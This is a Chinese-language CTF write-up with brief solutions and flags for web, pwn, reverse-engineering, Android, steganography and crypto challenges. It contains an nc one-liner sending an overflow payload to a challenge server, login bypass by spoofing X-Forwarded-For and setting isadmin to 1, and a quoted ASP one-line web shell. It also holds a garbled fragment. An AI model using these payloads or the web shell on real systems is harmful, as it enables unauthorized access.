Web
Find me 右键查看源码flag:{This_is_s0_simpl3}
密码泄露
http://39.107.92.230/web/web5/password.txt发现密码字典
爆破发现长度不一样的密码:Nsf0cuS
源码中截断了5位,修改请求包,将密码改为Nsf0cuS,返回这里没有flag字样
发现cookies:newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZdgzYjkucGhw
Base64解290bca70c7dae93db6644fa00b9d83b9.php
进入为留言板,然后
本地登录 抓包 添加X-Forwarded-For: 127.0.0.1,isadmin改为1
flag:{Why_ar3_y0u_s0_dia0}
Pwn1
脚本:cat <(python -c “print ‘\x11’*40+’\x34\x12\xcd\xab’”) - | nc bamboofox.cs.nctu.edu.tw 22001
参考:http://www.secist.com/archives/3619.html
https://blog.csdn.net/CJ_Kano/article/details/42404985
R100
Python脚本
Password为Code_Talkers,但是提交不对、
Re 逆向练习
OD调试KEY{e2s6ry3r5s8f6 共17位,
单步调试
再打开IDA发现后几位未1024}
Flag为KEY{e2s6ry3r5s8f61024}
后面的比较简单,没上传图,觉得麻烦,需要就看下,不需要就算了,还有很多难点的没做出来———有空继续
Re
1. PE格式
PETool打开
块数目 0x0004
时间戳 0x591D5CCC
入口地址 0x0005B789
便是 0x0103
组合下
BJWXB_CTF{0004h-591D5CCCh-0005B789h-0103h}
2.Re warmup100 简单的异或
调试后发现是异或
算出BJWXB_CTF{W4rm_UP_warm_up_WARM_UP!}
\"#vMDw
KMA3_b~w3o”, 18)) Android1:
Jeb打开发现,byte[]=aHR0cDovLzQ1LjMyLjQ3Ljk4
,base64解码得http://45.32.47.98,,flag为ip
Android05
enc(jeb打开一串字符串,15) #异或
android09
找到该方法,gevalue()反回值是20000,符合要求,所以只需修改判断处得标识,使执行,修改11,flag{11}
杂项
流量分析100
Tcp流追踪下载原始数据
得到 ,winhex打开doc发现key
key{23ac600a11eaffc8}
decode 3
JavaScript 代码转换,直接将其在控制台执行得flag=itisjavascriptenjoy%21
其中%21=!
Decode8
flag{Just_4_fun_0.0}
https://www.cnblogs.com/zqh20145320/p/5710072.html
ascii表得整体凯撒移动
Decode9
Flag{? enusCtf }
参见https://blog.csdn.net/lanvnal/article/details/54635612
控制台运行得到:┼攠數畣整爠煥敵瑳∨?湥獵瑃≦┩
把上面这串复制到记事本,另存为,编码选上“Unicode”,关闭。用WinHex等可以查看16进制的软件,直接打开,一目了然。如果想显示正常,把开头的FF FE两个字节删了,再用记事本打开就看到了。木马为 <% execute request(“? enusCtf”)%
隐写
Find 50
拖入stegSolve,发现二维码层,扫描即可得
被我吃了50
Binwalk一看,修改后缀为.zip,解压即可得flag.txt
合体鲸鱼
Frame browser
亚种50
Winhex直接打开flag{firsttry}
下雨天50 上工具StegSolve,好几个都是直接这工具就出来了、、、
愤怒得小猪100
扫码
真是动态图100
修改头格式,将9a改为GIF89a,打开是动态图,stegsolve分层看是base64编码,
组合为
Y2F0Y2hfdGh1X2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
解压catch_thu_dynamic_flag_is_qumte_simple,提交不对
改下key{catch_the_dynamic_flag_is_quite_simple},Ok!
密码学
德军密码(二进制密码)
KEY{YAHKR} 小写输入不对,不知道为啥
密钥生成
上脚本
d= 125631357777427553
rsa破解
通过公钥解密
openssl rsa -pubin -text -modulus -in warmup -in public.pem
得到n= 0xA41006DEFD378B7395B4E2EB1EC9BF56A61CD9C3B5A0A73528521EEB2FB817A7、
E= 65537 (0x10001)